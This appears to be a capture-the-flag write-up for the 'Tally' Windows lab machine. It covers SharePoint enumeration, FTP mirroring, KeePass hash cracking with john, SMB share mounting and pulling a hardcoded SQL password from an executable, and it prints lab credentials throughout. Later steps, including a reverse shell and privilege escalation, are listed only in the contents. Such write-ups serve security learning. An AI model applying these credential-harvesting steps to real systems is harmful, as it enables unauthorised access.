Windows Boxes

tally

  1. nmap
    1. all ports
    2. gobuster
      1. sharepoint
        1. viewlists.aspx
          1. /Documents
          2. Site Pages
  2. ftp
    1. find . -type f
  3. keepass
    1. kpcli -kdb tim.kdbx
  4. smb
    1. mounting smb account share
    2. connecting to the smb share with smbclient
      1. zz_Archived (dead end)
      2. zz_Migration/Binaries/New Folder/tester.exe
  5. sqsh interactive database shell
    1. xp_cmdshell does not exist
    2. reconfigure
    3. xp_cmdshell 'whoami'
    4. powershell IEX revshell
  6. privesc w/ juicy potato
    1. juicy potato
  7. priv esc w/ scheduled task
    1. SPBestWarmUp.ps1
    2. reverse shell
  8. user/root
  9. Lessons Learned

tally

images/1698-1.png
images/1698-2.png

nmap

Lets start off with an nmapAutomator scan
nmapAutomator
images/1699-1.png
---------------------------------------------------------------------------------------------------------------------------------------------
images/1699-2.png
images/1699-3.png

all ports

images/1700-1.pngimages/1700-2.png
images/1700-3.png

gobuster

images/1701-1.png

sharepoint

cat sharepoint_gobust.txt | more
/_app_bin (Status: 301)
/_controltemplates (Status: 301)
/_layouts (Status: 301)
/_layouts/1033 (Status: 301)
/_layouts/1033/avreport.htm (Status: 200)
/_layouts/1033/error.htm (Status: 200)
/_layouts/1033/filedlg.htm (Status: 200)
/_layouts/1033/fontdlg.htm (Status: 200)
/_layouts/1033/images (Status: 301)
/_layouts/1033/iframe.htm (Status: 200)
/_layouts/1033/instable.htm (Status: 200)
/_layouts/1033/menu.htc (Status: 200)
/_layouts/1033/menubar.htc (Status: 200)
/_layouts/1033/selcolor.htm (Status: 200)
/_layouts/1033/spthemes.xsd (Status: 200)
/_layouts/1033/spthemes.xml (Status: 200)
/_layouts/accessdenied.aspx (Status: 302)
/_layouts/addcontenttypetolist.aspx (Status: 302)
/_layouts/addfieldfromtemplate.aspx (Status: 302)
/_layouts/aclinv.aspx (Status: 302)
/_layouts/addwrkfl.aspx (Status: 302)
/_layouts/advsetng.aspx (Status: 302)
/_layouts/adminrecyclebin.aspx (Status: 302)
/_layouts/addrole.aspx (Status: 302)
/_layouts/approve.aspx (Status: 302)
/_layouts/aspxform.aspx (Status: 302)
/_layouts/addnavigationlinkdialog.aspx (Status: 200)
/_layouts/addfiletype.aspx (Status: 200)
/_layouts/addservernamemappings.aspx (Status: 200)
/_layouts/areanavigationsettings.aspx (Status: 200)
/_layouts/areatemplatesettings.aspx (Status: 200)
/_layouts/addcontentsource.aspx (Status: 200)
/_layouts/areacachesettings.aspx (Status: 200)
/_layouts/assetedithyperlink.aspx (Status: 200)
/_layouts/areawelcomepage.aspx (Status: 200)
/_layouts/assetimagepicker.aspx (Status: 200)
/_layouts/assocwrkfl.aspx (Status: 302)
/_layouts/associatedgroups.aspx (Status: 302)
/_layouts/audience_memberlist.aspx (Status: 200)
/_layouts/assetportalbrowser.aspx (Status: 200)
/_layouts/audience_main.aspx (Status: 200)
/_layouts/audience_edit.aspx (Status: 200)
/_layouts/assetuploader.aspx (Status: 200)
/_layouts/audience_list.aspx (Status: 200)
/_layouts/audience_defruleedit.aspx (Status: 200)
/_layouts/auditsettings.aspx (Status: 200)
/_layouts/audience_view.aspx (Status: 200)
/_layouts/audience_sched.aspx (Status: 200)
/_layouts/backlinks.aspx (Status: 302)
/_layouts/authenticate.aspx (Status: 302)
/_layouts/avreport.aspx (Status: 302)
/_layouts/bdcadminui/bdcapplications.aspx (Status: 200)
/_layouts/bdcadminui/exportbdcapplication.aspx (Status: 200)
/_layouts/bdcadminui/bdcentities.aspx (Status: 200)
/_layouts/bdcadminui/bdcentities.aspx (Status: 200)
/_layouts/bdcadminui/editbdcaction.aspx (Status: 200)
/_layouts/bdcadminui/addbdcaction.aspx (Status: 200)
/_layouts/bdcadminui/addbdcapplication.aspx (Status: 200)
/_layouts/barcodeimagefromitem.aspx (Status: 200)
/_layouts/bdcadminui/viewbdcentity.aspx (Status: 200)
/_layouts/bdcadminui/viewbdcapplication.aspx (Status: 200)
/_layouts/bdcadminui/managepermissions.aspx (Status: 200)
/_layouts/bestbet.aspx (Status: 302)
/_layouts/changecontenttypeoptionalsettings.aspx (Status: 302)
/_layouts/bulkwrktaskip.aspx (Status: 200)
/_layouts/bulkwrktaskhandler.aspx (Status: 200)
/_layouts/bpcf.aspx (Status: 302)
/_layouts/businessdatasynchronizer.aspx (Status: 302)
/_layouts/changesitemasterpage.aspx (Status: 200)
/_layouts/category.aspx (Status: 302)
/_layouts/changecontenttypeorder.aspx (Status: 302)
/_layouts/changefieldorder.aspx (Status: 302)
/_layouts/checkin.aspx (Status: 302)
/_layouts/cmsslwpaddeditlink.aspx (Status: 200)
/_layouts/cmsslwpaddeditgroup.aspx (Status: 200)
/_layouts/cmsslwpeditview.aspx (Status: 200)
/_layouts/cmsslwpsortlinks.aspx (Status: 200)
/_layouts/contenttypeconvertersettings.aspx (Status: 200)
/_layouts/convertersettings.aspx (Status: 200)
/_layouts/contentaccessaccount.aspx (Status: 200)
/_layouts/copyresults.aspx (Status: 302)
/_layouts/containerpicker.aspx (Status: 302)
/_layouts/copyrole.aspx (Status: 302)
/_layouts/copy.aspx (Status: 302)
/_layouts/conngps.aspx (Status: 302)
/_layouts/confirmation.aspx (Status: 302)
/_layouts/crawledproperty.aspx (Status: 302)
/_layouts/create.aspx (Status: 302)
/_layouts/copyutil.aspx (Status: 302)
/_layouts/createadaccount.aspx (Status: 302)
/_layouts/cstwrkflip.aspx (Status: 200)
/_layouts/ctdmsettings.aspx (Status: 200)
/_layouts/createworkbook.aspx (Status: 200)
/_layouts/customizereport.aspx (Status: 200)
/_layouts/createpage.aspx (Status: 200)
/_layouts/createws.aspx (Status: 302)
/_layouts/createwebpage.aspx (Status: 302)
/_layouts/ctypedit.aspx (Status: 302)
/_layouts/ctypenew.aspx (Status: 302)
/_layouts/discbar.aspx (Status: 302)
/_layouts/dws.aspx (Status: 302)
/_layouts/deletemu.aspx (Status: 302)
/_layouts/download.aspx (Status: 302)
/_layouts/doctrans.aspx (Status: 302)
/_layouts/dladvopt.aspx (Status: 302)
/_layouts/deleteweb.aspx (Status: 302)
/_layouts/deactivatefeature.aspx (Status: 302)
/_layouts/dynamicimageprovider.aspx (Status: 200)
/_layouts/dmplaceholder.aspx (Status: 200)
/_layouts/editnav.aspx (Status: 302)
/_layouts/editgrp.aspx (Status: 302)
/_layouts/editprms.aspx (Status: 302)
/_layouts/editcopyinformation.aspx (Status: 302)
/_layouts/editdsserver.aspx (Status: 200)
/_layouts/editprofile.aspx (Status: 200)
/_layouts/editcrawlrule.aspx (Status: 200)
/_layouts/editpolicy.aspx (Status: 200)
/_layouts/editproperty.aspx (Status: 200)
/_layouts/editcontentsource.aspx (Status: 200)
/_layouts/editrole.aspx (Status: 302)
/_layouts/editpropertynames.aspx (Status: 200)
/_layouts/editpropertynames2.aspx (Status: 200)
/_layouts/editrelevancesettings.aspx (Status: 200)
/_layouts/editview.aspx (Status: 302)
/_layouts/enhancedsearch.aspx (Status: 302)
/_layouts/emaildetails.aspx (Status: 302)
/_layouts/error.aspx (Status: 302)
/_layouts/emailsettings.aspx (Status: 302)
/_layouts/enablealerts.aspx (Status: 200)
/_layouts/ewrcustomfilter.aspx (Status: 200)
/_layouts/editschedule.aspx (Status: 200)
/_layouts/editsection.aspx (Status: 200)
/_layouts/ewrfilter.aspx (Status: 200)
/_layouts/ewrfind.aspx (Status: 200)
/_layouts/excelcellpicker.aspx (Status: 200)
/_layouts/ewrpredialog.aspx (Status: 200)
/_layouts/ewrtop10.aspx (Status: 200)
/_layouts/excelserversafedataprovider.aspx (Status: 200)
/_layouts/excelservertrustedlocation.aspx (Status: 200)
/_layouts/excelprofilepage.aspx (Status: 200)
/_layouts/excelservertrusteddcl.aspx (Status: 200)
/_layouts/excelserversafedataproviders.aspx (Status: 200)
/_layouts/excelserversettings.aspx (Status: 200)
/_layouts/excelservertrusteddcls.aspx (Status: 200)
/_layouts/excelrenderer.aspx (Status: 200)
/_layouts/excelserveruserdefinedfunction.aspx (Status: 200)
/_layouts/exportpolicy.aspx (Status: 200)
/_layouts/excelserveruserdefinedfunctions.aspx (Status: 200)
/_layouts/excelservertrustedlocations.aspx (Status: 200)
/_layouts/feed.aspx (Status: 200)
/_layouts/exemptpolicy.aspx (Status: 200)
/_layouts/filter.aspx (Status: 302)
/_layouts/fldeditex.aspx (Status: 302)
/_layouts/fldedit.aspx (Status: 302)
/_layouts/filtervaluespickerdialog.aspx (Status: 302)
/_layouts/formedt.aspx (Status: 302)
/_layouts/fldnew.aspx (Status: 302)
/_layouts/fldpick.aspx (Status: 302)
/_layouts/fldnewex.aspx (Status: 302)
/_layouts/formresource.aspx (Status: 200)
/_layouts/folders.aspx (Status: 200)
/_layouts/groups.aspx (Status: 302)
/_layouts/genericpicker.aspx (Status: 302)
/_layouts/gear.aspx (Status: 302)
/_layouts/formserver.aspx (Status: 200)
/_layouts/getssploginfo.aspx (Status: 200)
/_layouts/getsspstatus.aspx (Status: 200)
/_layouts/formserverattachments.aspx (Status: 200)
/_layouts/formserverdetector.aspx (Status: 200)
/_layouts/getdataconnectionfile.aspx (Status: 200)
/_layouts/getsspscopes.aspx (Status: 200)
/_layouts/htmltrredir.aspx (Status: 302)
/_layouts/helpsearch.aspx (Status: 302)
/_layouts/help.aspx (Status: 302)
/_layouts/htmltrverify.aspx (Status: 302)
/_layouts/iframe.aspx (Status: 302)
/_layouts/htmledit.aspx (Status: 302)
/_layouts/helpcontent.aspx (Status: 302)
/_layouts/htmltranslate.aspx (Status: 302)
/_layouts/images/ (Status: 403)
/_layouts/infopage.aspx (Status: 302)
/_layouts/holdreport.aspx (Status: 200)
/_layouts/hold.aspx (Status: 200)
/_layouts/irm.aspx (Status: 302)
/_layouts/itemrwfassoc.aspx (Status: 302)
/_layouts/irmrept.aspx (Status: 302)
/_layouts/indxcol.aspx (Status: 302)
/_layouts/iniwrkflip.aspx (Status: 200)
/_layouts/importpolicy.aspx (Status: 200)
/_layouts/listedit.aspx (Status: 302)
/_layouts/labelimage.aspx (Status: 200)
/_layouts/listgeneralsettings.aspx (Status: 302)
/_layouts/linkscheckerwiz.aspx (Status: 200)
/_layouts/keyword.aspx (Status: 302)
/_layouts/listfeed.aspx (Status: 302)
/_layouts/linkschecker.aspx (Status: 200)
/_layouts/iviewhost.aspx (Status: 200)
/_layouts/listkeywords.aspx (Status: 302)
/_layouts/listenabletargeting.aspx (Status: 200)
/_layouts/listcontentsources.aspx (Status: 200)
/_layouts/listsyndication.aspx (Status: 302)
/_layouts/login.aspx (Status: 302)
/_layouts/listservernamemappings.aspx (Status: 200)
/_layouts/logsummary.aspx (Status: 200)
/_layouts/managecontenttype.aspx (Status: 302)
/_layouts/longrunningoperationprogress.aspx (Status: 200)
/_layouts/logviewer.aspx (Status: 200)
/_layouts/lstsetng.aspx (Status: 302)
/_layouts/managecheckedoutfiles.aspx (Status: 302)
/_layouts/managecontenttypefield.aspx (Status: 302)
/_layouts/lroperationstatus.aspx (Status: 200)
/_layouts/managefiletypes.aspx (Status: 200)
/_layouts/managefeatures.aspx (Status: 302)
/_layouts/managefeatures.aspx?scope=site (Status: 302)
/_layouts/managedproperty.aspx (Status: 302)
/_layouts/managecopies.aspx (Status: 302)
/_layouts/manageprivacypolicy.aspx (Status: 200)
/_layouts/managecrawlrules.aspx (Status: 200)
/_layouts/manageitemscheduling.aspx (Status: 200)
/_layouts/matchingrule.aspx (Status: 302)
/_layouts/manageservicepermissions.aspx (Status: 200)
/_layouts/mgrproperty.aspx (Status: 200)
/_layouts/metaweblog.aspx (Status: 302)
/_layouts/mngfield.aspx (Status: 302)
/_layouts/mngsiteadmin.aspx (Status: 302)
/_layouts/mngdisc.aspx (Status: 200)
/_layouts/mcontent.aspx (Status: 302)
/_layouts/mgrdsserver.aspx (Status: 200)
/_layouts/mngsubwebs.aspx (Status: 302)
/_layouts/mngctype.aspx (Status: 302)
/_layouts/mobile/bloghome.aspx (Status: 302)
/_layouts/mngsubwebs.aspx?view=sites (Status: 302)
/_layouts/mobile/delete.aspx (Status: 302)
/_layouts/mobile/dispform.aspx (Status: 302)
/_layouts/mobile/mblerror.aspx (Status: 302)
/_layouts/mobile/mbllists.aspx (Status: 302)
/_layouts/mobile/disppost.aspx (Status: 302)
/_layouts/mobile/editform.aspx (Status: 302)
/_layouts/mobile/mbllogout.aspx (Status: 302)
/_layouts/mobile/default.aspx (Status: 302)
/_layouts/mobile/mbllogin.aspx (Status: 302)
/_layouts/mobile/mobileformserver.aspx (Status: 200)
/_layouts/mobile/viewcomment.aspx (Status: 302)
/_layouts/mobile/newcomment.aspx (Status: 302)
/_layouts/mobile/view.aspx (Status: 302)
/_layouts/mobile/newpost.aspx (Status: 302)
/_layouts/mtgredir.aspx (Status: 302)
/_layouts/myinfo.aspx (Status: 200)
/_layouts/mymemberships.aspx (Status: 200)
/_layouts/modwrkflip.aspx (Status: 200)
/_layouts/mobile/newform.aspx (Status: 302)
/_layouts/mycontactlinks.aspx (Status: 200)
/_layouts/mysubs.aspx (Status: 302)
/_layouts/mysite.aspx (Status: 200)
/_layouts/mypage.aspx (Status: 200)
/_layouts/newdwp.aspx (Status: 302)
/_layouts/mysiteheader.aspx (Status: 200)
/_layouts/navoptions.aspx (Status: 302)
/_layouts/myquicklinks.aspx (Status: 200)
/_layouts/mytasks.aspx (Status: 302)
/_layouts/newnav.aspx (Status: 302)
/_layouts/newsbweb.aspx (Status: 302)
/_layouts/newgrp.aspx (Status: 302)
/_layouts/newlink.aspx (Status: 302)
/_layouts/new.aspx (Status: 302)
/_layouts/newmws.aspx (Status: 302)
/_layouts/newpagelayout.aspx (Status: 200)
/_layouts/newtranslationmanagement.aspx (Status: 200)
/_layouts/pageversioninfo.aspx (Status: 200)
/_layouts/officialfilesuccess.aspx (Status: 200)
/_layouts/officialfilesetup.aspx (Status: 200)
/_layouts/nocrawlsettings.aspx (Status: 200)
/_layouts/newvariationsite.aspx (Status: 200)
/_layouts/osssearchresults.aspx (Status: 302)
/_layouts/password.aspx (Status: 302)
/_layouts/pagesettings.aspx (Status: 200)
/_layouts/objectcachesettings.aspx (Status: 200)
/_layouts/people.aspx (Status: 302)
/_layouts/pickertreeview.aspx (Status: 200)
/_layouts/personalsites.aspx (Status: 200)
/_layouts/pickerresult.aspx (Status: 200)
/_layouts/policy.aspx (Status: 200)
/_layouts/picker.aspx (Status: 302)
/_layouts/people.aspx?membershipgroupid=0 (Status: 302)
/_layouts/permsetup.aspx (Status: 302)
/_layouts/policyconfig.aspx (Status: 200)
/_layouts/portal.aspx (Status: 302)
/_layouts/portalview.aspx (Status: 302)
/_layouts/prjsetng.aspx (Status: 302)
/_layouts/profileredirect.aspx (Status: 302)
/_layouts/policylist.aspx (Status: 200)
/_layouts/postback.formserver.aspx (Status: 200)
/_layouts/policycts.aspx (Status: 200)
/_layouts/print.formserver.aspx (Status: 200)
/_layouts/printloader.formserver.aspx (Status: 200)
/_layouts/profadminedit.aspx (Status: 200)
/_layouts/profnew.aspx (Status: 200)
/_layouts/profmain.aspx (Status: 200)
/_layouts/proxy.aspx (Status: 200)
/_layouts/qstnew.aspx (Status: 302)
/_layouts/qlreord.aspx (Status: 302)
/_layouts/qstedit.aspx (Status: 302)
/_layouts/publishback.aspx (Status: 302)
/_layouts/quicklinks.aspx (Status: 200)
/_layouts/quicklinksdialog.aspx (Status: 200)
/_layouts/profmngr.aspx (Status: 200)
/_layouts/reghost.aspx (Status: 302)
/_layouts/rcxform.aspx (Status: 302)
/_layouts/regionalsetng.aspx (Status: 302)
/_layouts/recyclebin.aspx (Status: 302)
/_layouts/quiklnch.aspx (Status: 302)
/_layouts/redirect.aspx (Status: 302)
/_layouts/redirectpage.aspx (Status: 200)
/_layouts/redirectpage.aspx?target={sitecollectionurl}_catalogs/masterpage (Status: 200)
/_layouts/quicklinksdialogform.aspx (Status: 200)
/_layouts/quicklinksdialog2.aspx (Status: 200)
/_layouts/reorder.aspx (Status: 302)
/_layouts/reqfeatures.aspx (Status: 302)
/_layouts/reqgroup.aspx (Status: 302)
/_layouts/reqacc.aspx (Status: 302)
/_layouts/remwrkfl.aspx (Status: 302)
/_layouts/reqgroupconfirm.aspx (Status: 302)
/_layouts/reporting.aspx (Status: 200)
/_layouts/rellinksscopesettings.aspx (Status: 200)
/_layouts/resolverecipient.aspx (Status: 200)
/_layouts/renderudc.aspx (Status: 200)
/_layouts/releasehold.aspx (Status: 200)
/_layouts/rssxslt.aspx (Status: 302)
/_layouts/role.aspx (Status: 302)
/_layouts/rfpxform.aspx (Status: 302)
/_layouts/rfcxform.aspx (Status: 302)
/_layouts/rte2ecell.aspx (Status: 200)
/_layouts/savetmpl.aspx (Status: 302)
/_layouts/scope.aspx (Status: 302)
/_layouts/rtedialog.aspx (Status: 302)
/_layouts/scopedisplaygroup.aspx (Status: 302)
/_layouts/scsignup.aspx (Status: 302)
/_layouts/rte2erowcolsize.aspx (Status: 200)
/_layouts/reusabletextpicker.aspx (Status: 200)
/_layouts/rte2pueditor.aspx (Status: 200)
/_layouts/rte2etable.aspx (Status: 200)
/_layouts/schema.aspx (Status: 200)
/_layouts/runreport.aspx (Status: 200)
/_layouts/searchresults.aspx (Status: 302)
/_layouts/searchresultremoval.aspx (Status: 200)
/_layouts/searchreset.aspx (Status: 200)
/_layouts/searchandaddtohold.aspx (Status: 200)
/_layouts/selectcrawledproperty.aspx (Status: 302)
/_layouts/selectmanagedproperty.aspx (Status: 302)
/_layouts/searchsspsettings.aspx (Status: 200)
/_layouts/selectuser.aspx (Status: 200)
/_layouts/selectpicture2.aspx (Status: 200)
/_layouts/setimport.aspx (Status: 200)
/_layouts/selectpicture.aspx (Status: 200)
/_layouts/setrqacc.aspx (Status: 302)
/_layouts/setanon.aspx (Status: 302)
/_layouts/sendtoofficialfile.aspx (Status: 401)
/_layouts/signout.aspx (Status: 302)
/_layouts/settings.aspx (Status: 302)
/_layouts/siterss.aspx (Status: 302)
/_layouts/signaturedetailsloader.formserver.aspx (Status: 200)
/_layouts/signaturedetails.formserver.aspx (Status: 200)
/_layouts/signaturedetailspngloader.formserver.aspx (Status: 200)
/_layouts/sitecachesettings.aspx (Status: 200)
/_layouts/signatureeula.formserver.aspx (Status: 200)
/_layouts/sitemanager.aspx?lro=all (Status: 200)
/_layouts/signature.formserver.aspx (Status: 200)
/_layouts/sitemanager.aspx (Status: 200)
/_layouts/sitedirectorysettings.aspx (Status: 200)
/_layouts/smtcommentsdialog.aspx (Status: 200)
/_layouts/slnew.aspx (Status: 200)
/_layouts/spusageconfig.aspx (Status: 200)
/_layouts/spellchecker.aspx (Status: 200)
/_layouts/sledit.aspx (Status: 200)
/_layouts/spsredirect.aspx (Status: 200)
/_layouts/spnewdashboard.aspx (Status: 200)
/_layouts/spcf.aspx (Status: 302)
/_layouts/sitesubs.aspx (Status: 302)
/_layouts/spcontnt.aspx (Status: 302)
/_layouts/spusagesiteclickthroughs.aspx (Status: 200)
/_layouts/spusagesitereferrers.aspx (Status: 200)
/_layouts/spusagesitesearchqueries.aspx (Status: 200)
/_layouts/spusagesitesearchresults.aspx (Status: 200)
/_layouts/spusagesitehomepage.aspx (Status: 200)
/_layouts/spusagesite.aspx (Status: 200)
/_layouts/spusagewebusers.aspx (Status: 200)
/_layouts/spusagewebtoppages.aspx (Status: 200)
/_layouts/spusagesitetoppages.aspx (Status: 200)
/_layouts/spusagewebclickthroughs.aspx (Status: 200)
/_layouts/spusagesspsearchqueries.aspx (Status: 200)
/_layouts/spusagesspsearchresults.aspx (Status: 200)
/_layouts/spusageweb.aspx (Status: 200)
/_layouts/spusagewebreferrers.aspx (Status: 200)
/_layouts/spusagesiteusers.aspx (Status: 200)
/_layouts/spusagewebhomepage.aspx (Status: 200)
/_layouts/ssologon.aspx (Status: 200)
/_layouts/subchoos.aspx (Status: 302)
/_layouts/submitrepair.aspx (Status: 302)
/_layouts/storman.aspx (Status: 302)
/_layouts/subnew.aspx (Status: 302)
/_layouts/srchvis.aspx (Status: 302)
/_layouts/srchrss.aspx (Status: 302)
/_layouts/success.aspx (Status: 302)
/_layouts/subedit.aspx (Status: 302)
/_layouts/topnav.aspx (Status: 302)
/_layouts/survedit.aspx (Status: 302)
/_layouts/updatecopies.aspx (Status: 302)
/_layouts/themeweb.aspx (Status: 302)
/_layouts/toolpane.aspx (Status: 302)
/_layouts/templatepick.aspx (Status: 302)
/_layouts/tnreord.aspx (Status: 302)
/_layouts/updateschedule.aspx (Status: 200)
/_layouts/translatablesettings.aspx (Status: 200)
/_layouts/unapprovedresources.aspx (Status: 200)
/_layouts/userdisp.aspx?id=1 (Status: 302)
/_layouts/user.aspx (Status: 302)
/_layouts/useconfirmation.aspx (Status: 302)
/_layouts/usage.aspx (Status: 302)
/_layouts/usagedetails.aspx (Status: 302)
/_layouts/upload.aspx (Status: 302)
/_layouts/userdisp.aspx (Status: 302)
/_layouts/useredit.aspx (Status: 302)
/_layouts/useredit.aspx?id=1&source=%2f%5flayouts%2fpeople%2easpx (Status: 302)
/_layouts/versiondiff.aspx (Status: 302)
/_layouts/versions.aspx (Status: 302)
/_layouts/variationsettings.aspx (Status: 200)
/_layouts/variations/variationimport.aspx (Status: 200)
/_layouts/variationlabel.aspx (Status: 200)
/_layouts/variationexport.aspx (Status: 200)
/_layouts/variationlogs.aspx (Status: 200)
/_layouts/variationlabels.aspx (Status: 200)
/_layouts/viewscopesettings.aspx (Status: 302)
/_layouts/viewnew.aspx (Status: 302)
/_layouts/viewlsts.aspx (Status: 302)
/_layouts/viewedit.aspx (Status: 302)
/_layouts/viewtype.aspx (Status: 302)
/_layouts/vsubwebs.aspx (Status: 302)
/_layouts/viewgrouppermissions.aspx (Status: 302)
/_layouts/viewscopes.aspx (Status: 302)
/_layouts/webpartgallerypickerpage.aspx (Status: 302)
/_layouts/webdeleted.aspx (Status: 302)
/_layouts/workspce.aspx (Status: 302)
/_layouts/workflow.aspx (Status: 302)
/_layouts/wpprevw.aspx (Status: 302)
/_layouts/wpeula.aspx (Status: 302)
/_layouts/wrksetng.aspx (Status: 302)
/_layouts/wpprevw.aspx?id=247 (Status: 302)
/_layouts/wrkstat.aspx (Status: 302)
/_layouts/wsrpmarkupproxy.aspx (Status: 200)
/_layouts/zoombldr.aspx (Status: 302)
/_vti_bin (Status: 301)
/_vti_bin/_vti_adm/admin.dll (Status: 200)
/_vti_bin/alertsdisco.aspx (Status: 200)
/_vti_bin/_vti_aut/author.dll (Status: 200)
/_vti_bin/alerts.asmx (Status: 200)
/_layouts/xlatewfassoc.aspx (Status: 200)
/_vti_adm/admin.asmx (Status: 200)
/_vti_bin/alertswsdl.aspx (Status: 200)
/_layouts/xlviewer.aspx (Status: 200)
/_layouts/wrktaskip.aspx (Status: 200)
/_vti_bin/dspsts.asmx (Status: 200)
/_vti_bin/dspstsdisco.aspx (Status: 200)
/_vti_bin/authentication.asmx (Status: 200)
/_vti_bin/copy.asmx (Status: 200)
/_vti_bin/dspstswsdl.aspx (Status: 200)
/_vti_bin/dws.asmx (Status: 200)
/_vti_bin/dwsdisco.aspx (Status: 200)
/_vti_bin/exportwp.aspx (Status: 302)
/_vti_bin/dwswsdl.aspx (Status: 200)
/_vti_bin/forms.asmx (Status: 200)
/_vti_bin/imaging.asmx (Status: 200)
/_vti_bin/formsdisco.aspx (Status: 200)
/_vti_bin/imagingdisco.aspx (Status: 200)
/_vti_bin/formswsdl.aspx (Status: 200)
/_vti_bin/listsdisco.aspx (Status: 200)
/_vti_bin/meetings.asmx (Status: 200)
/_vti_bin/lists.asmx (Status: 200)
/_vti_bin/meetingsdisco.aspx (Status: 200)
/_vti_bin/imagingwsdl.aspx (Status: 200)
/_vti_bin/meetingswsdl.aspx (Status: 200)
/_vti_bin/listswsdl.aspx (Status: 200)
/_vti_bin/people.asmx (Status: 200)
/_vti_bin/permissions.asmx (Status: 200)
/_vti_bin/microsoft.sharepoint.xml (Status: 200)
/_vti_bin/searchdisco.aspx (Status: 200)
/_vti_bin/search.asmx (Status: 200)
/_vti_bin/publishedlinksservice.asmx (Status: 200)
/_vti_bin/permissionswsdl.aspx (Status: 200)
/_vti_bin/permissionsdisco.aspx (Status: 200)
/_vti_bin/sitedatadisco.aspx (Status: 200)
/_vti_bin/sitedata.asmx (Status: 200)
/_vti_bin/sitedatawsdl.aspx (Status: 200)
/_vti_bin/searchwsdl.aspx (Status: 200)
/_vti_bin/sites.asmx (Status: 200)
/_vti_bin/shtml.dll (Status: 200)
/_vti_bin/sharepointemailws.asmx (Status: 200)
/_vti_bin/sitesdisco.aspx (Status: 200)
/_vti_bin/siteswsdl.aspx (Status: 200)
/_vti_bin/owssvr.dll (Status: 401)
/_vti_bin/expurlwp.aspx (Status: 302)
/_layouts/wrkmng.aspx (Status: 401)
/_vti_bin/spsearch.asmx (Status: 200)
/_vti_bin/usergroup.asmx (Status: 200)
/_vti_bin/spdisco.aspx (Status: 200)
/_vti_bin/versions.asmx (Status: 200)
/_vti_bin/usergroupdisco.aspx (Status: 200)
/_vti_bin/versionswsdl.aspx (Status: 200)
/_vti_bin/viewsdisco.aspx (Status: 200)
/_vti_bin/versionsdisco.aspx (Status: 200)
/_vti_bin/views.asmx (Status: 200)
/_vti_bin/usergroupwsdl.aspx (Status: 200)
/_vti_bin/viewswsdl.aspx (Status: 200)
/_vti_bin/webs.asmx (Status: 200)
/_vti_bin/websdisco.aspx (Status: 200)
/_vti_bin/webswsdl.aspx (Status: 200)
/_vti_bin/webpartpageswsdl.aspx (Status: 200)
/_vti_bin/webpartpages.asmx (Status: 200)
/_vti_bin/webpartpagesdisco.aspx (Status: 200)
/_wpresources (Status: 301)
/_vti_pvt (Status: 301)
/_vti_inf.html (Status: 200)
/alerts.asmx (Status: 200)
/app_browsers (Status: 301)
/app_globalresources (Status: 301)
/areaservice.asmx (Status: 200)
/aspnet_client (Status: 301)
/bin (Status: 301)
/default.aspx (Status: 200)
/docs/_layouts/viewlsts.aspx (Status: 302)
/dspsts.asmx (Status: 200)
/dws.asmx (Status: 200)
/forms.asmx (Status: 200)
/imaging.asmx (Status: 200)
/lists.asmx (Status: 200)
/meetings.asmx (Status: 200)
/mysite/_layouts/mysite.aspx (Status: 200)
/news/_layouts/viewlsts.aspx (Status: 302)
/outlookadapter.asmx (Status: 200)
/permissions.asmx (Status: 200)
/search.asmx (Status: 200)
/searchcenter/_layouts/viewlsts.aspx (Status: 302)
/sitedata.asmx (Status: 200)
/sitedirectory/_layouts/viewlsts.aspx (Status: 302)
/shared documents/forms/allitems.aspx (Status: 200)
/sites.asmx (Status: 200)
/spscrawl.asmx (Status: 200)
/userprofileservice.asmx (Status: 200)
/usergroup.asmx (Status: 200)
/versions.asmx (Status: 200)
/views.asmx (Status: 200)
/webpartpages.asmx (Status: 200)
/webs.asmx (Status: 200)
/wpresources (Status: 301)

viewlists.aspx

images/1703-1.png
images/1703-2.png

To view these documents, download libreoffice if you don't already have it installed with
images/1703-3.png

/Documents

images/1704-1.png

lets view the contents of this word document with
libreoffice ftp-details.docx
images/1704-2.png
images/1704-3.png
images/1704-4.png
password:UTDRSCH53c"$6hys

Site Pages

images/1705-1.png

No need for libreoffice since clicking this link redirects us to the doc within our webbrowser.
images/1705-2.png

ftp

we can use our creds from the sharepoint documents to authenticate as ftp_user:UTDRSCH53c"$6hys and recursively download all of the ftp servers contents with

wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'
images/1711-1.png

doing so creates a directory for us we can enumerate:
images/1711-2.png

find . -type f

lets run a find command and look for files stored within the ftp server that may be interesting

find . -type f
where
. runs find on our current directory and
-type f specifies find will return only files
images/1709-1.png


images/1709-2.png
we see there are a number of keepass database files that may contain sensitive information on our target, lets see if we can use kpcli without a password to view it

kpcli -kdb ./Tim/Files/tim.kdbx
images/1709-3.png

its password protected, which means we need to crack its password in order to view its contents, luckily jumbojohn has just the tools we need

keepass

because we're cracking a keepass password and we need to supply john with a password hash format it can crack, we'll first use keepass2john to generate a password hash and then run it against a password list (rockyou.txt) in john itself

keepass2john ./Tim/Files/tim.kdbx > tim_kdbx_hash
images/1708-1.png

john --format=keepass --wordlist=/usr/share/wordlists/rockyou.txt
images/1708-2.png

our password is simplementeyo!
images/1708-3.png

kpcli -kdb tim.kdbx

now that we have our creds password:simplementeyo, we can view the contents of tim's keepass database with the program kpcli

kpcli --kdb tim.kdbx
images/1710-1.png


Creds
Acc0unting
images/1710-2.png
images/1710-3.png

images/1710-4.png

smb

2 ways to read TALLY's Finance smb share

1)mounting the smb account share with mount

2)connecting to the smb share with smbclient

mounting smb account share

step 1: make an smb directory in our attack machine's /mnt folder
images/1712-1.png

Mount example:
sudo mount -t cifs -o "domain=MYDOMAIN,username=MyUserName,password=myPas$werd,sec=ntlm" //<your windows host ip>/<your remote share name> /mnt/my_mount_dir



mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb
our leaked password was Acc0unting
images/1712-2.png

rummaging through the file share, there is a directory named New Folder within the zz_Migration folder which is suspicious as to why it was never named anything specific
images/1712-3.png

tester.exe is the oldest and most peculular looking .exe in the directory, it was hardcoded by the devs and is not a commercial off the shelf executable so lets check it to see if it has any credentials hard coded:

strings tester.exe | grep PWD
images/1712-4.png

there is an SQL Server with user info and a password hardcoded into the .exe!
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

connecting to the smb share with smbclient

smbclient //10.10.10.59/ACCT -U Finance
recall the share password Acc0unting
images/1723-1.png
images/1723-2.png

zz_Archived (dead end)

images/1724-1.png

old server creds will NOT connect us to the database, looking at the strings of tester.exe will
images/1724-2.png

zz_Migration/Binaries/New Folder/tester.exe

images/1728-1.png

